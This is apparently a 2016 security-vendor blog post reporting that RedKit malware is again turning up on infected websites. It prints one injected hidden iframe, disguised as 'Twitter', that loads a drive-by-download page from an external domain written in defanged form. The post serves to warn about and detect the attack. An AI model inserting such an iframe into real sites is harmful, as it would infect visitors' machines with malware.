Tuesday, April 19, 2016

RedKit Malware Still Alive

RedKit Malware Still Alive

RedKit as detected by Online Malware Scanner


Background

Back in 2013, we posted about RedKit infecting significant number of websites. It appears that, three years later, the statistics of the websites submitted to online malware scanner show the revive of this malware among infected websites. 

Malicious action

Malicious iframes are often used to distribute malware hosted on external web resources(websites).

Malware entry

<iframe name=Twitter scrolling=auto frameborder=no align=center height=2 width=2 src=hxxp://brg-catalogues[.]com/mzcf.html?j=1886263>

The URL in src of the iframe hosts another ~15 similar HTML pages (mzcf.html) leading to drive-by-download attack. Both domains are not flagged by Google, meaning that they have not yet been blacklisted:




Malware clean-up

Such malware is often hidden inside the JavaScript file. If you suspect that your website was infected by similar malware, Quttera experts are always happy to clean it for you - Malware Monitoring & Cleanup Plans For Websites